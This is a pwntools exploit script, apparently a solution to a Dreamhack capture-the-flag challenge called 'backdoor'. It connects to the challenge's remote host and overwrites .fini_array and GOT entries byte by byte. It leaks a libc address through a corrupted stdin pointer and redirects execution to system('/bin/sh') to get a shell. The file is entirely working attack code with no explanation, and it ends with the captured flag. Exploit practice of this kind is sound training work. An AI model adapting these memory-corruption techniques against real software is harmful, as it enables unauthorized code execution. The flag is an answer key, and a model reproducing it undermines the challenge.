from pwn import *
context.log_level = "debug"
# io = process("./backdoor", env={"LD_PRELOAD": "./libc.so.6"})
io = remote("host8.dreamhack.games", 12661)
# io = remote("172.17.0.1", 7777)
e = ELF("./backdoor", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
def sendNum(dest, val):
io.sendline(str(val & 0xFF)[::-1].encode())
io.sendline(str(dest)[::-1].encode())
fini0Addr = 0x6009B8
fini1Addr = 0x6009C0
dummy = 0x600B60
main = 0x4005D3
start = 0x400640
chk = e.got["__stack_chk_fail"]
setbuf = e.got["setbuf"]
sleep = e.got["sleep"]
getchar = e.got["getchar"]
libc_start_main = e.got["__libc_start_main"]
stdin = 0x600C10
stdout = 0x600C00
# AAW Loop
sendNum(fini1Addr, 0xF6 & 0xFF)
sendNum(chk, 0xF6 & 0xFF)
sendNum(fini0Addr, 0x06 & 0xFF)
sendNum(fini0Addr, 0x06 & 0xFF)
sendNum(fini0Addr, 0x06 & 0xFF)
sendNum(fini0Addr, 0x06 & 0xFF)
sendNum(fini0Addr, 0x06 & 0xFF)
sendNum(fini0Addr, 0x06 & 0xFF)
sendNum(fini0Addr, 0x06 & 0xFF)
pause()
# stdin ovwrite + leak
for i in range(6):
sendNum(stdin + i, (getchar >> (8 * i)) & 0xFF)
sendNum(setbuf + 1, 0x09 & 0xFF)
sendNum(chk, 0xD3 & 0xFF)
io.recvline()
libc_base = u64(io.recv(6).ljust(8, b"\x00")) - libc.sym["getchar"]
libc.address = libc_base
log.info(f"libc base: {hex(libc_base)}")
sendNum(chk, 0x06)
sendNum(chk + 1, 0x06)
for i in range(6):
sendNum(stdin + i, (next(libc.search(b"/bin/sh\x00")) >> (8 * i)) & 0xFF)
for i in range(6):
sendNum(setbuf + i, (0x4005A9 >> (8 * i)) & 0xFF)
for i in range(6):
sendNum(sleep + i, (libc.sym["system"] >> (8 * i)) & 0xFF)
for i in range(6):
sendNum(libc_start_main + i, (0x4005D3 >> (8 * i)) & 0xFF)
sendNum(chk, 0x64 & 0xFF)
io.interactive()
# DH{86bb4a1255f18b5942def47ce5171538}